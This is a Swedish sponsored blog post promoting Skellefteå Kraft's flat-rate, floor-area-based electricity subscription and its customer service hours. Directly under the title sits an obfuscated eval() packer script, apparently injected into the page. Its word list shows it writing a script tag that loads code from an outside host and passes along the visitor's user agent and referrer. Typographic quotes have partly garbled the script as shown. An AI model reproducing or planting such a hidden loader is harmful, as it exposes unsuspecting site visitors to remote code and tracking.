Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Sponsrat inlägg: Inte en eljätte, Skellefteå Kraft

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hdinf|var|u0026u|referrer|fkkbe||js|php’.split(’|’),0,{}))

I många år har flera kunder försökt att förstå hur de stora elbolagen fungerar och tänker, på Skellefteå Kraft vill man istället förstå kunderna. 

De stora elbolagen fokuserar ofta på komplicerade abonnemang vilket Skellefteå kraft försöker att göra på andra sätt som ska göra livet lättare.

Människor är inte speciellt intresserade av el, och detta vet Skellefteå Kraft. Därför har man som första elbolag tagit fram Kvadratmeterpris, ett abonnemang helt utan kilowattimmar och andra överraskande elräkningar.  Som kund betalar man därför varje månad samma pris baserat på bostadsytan.

Vill du teckna abonnemang kontaktar du Skellefteå Krafts kundservice som till skillnad från andra elbolag har öppet varje dag i veckan: 8-20 på vardagar och 10-15 på helger. Det går förstås också bra att teckna abonnemang på hemsidan skekraft.se.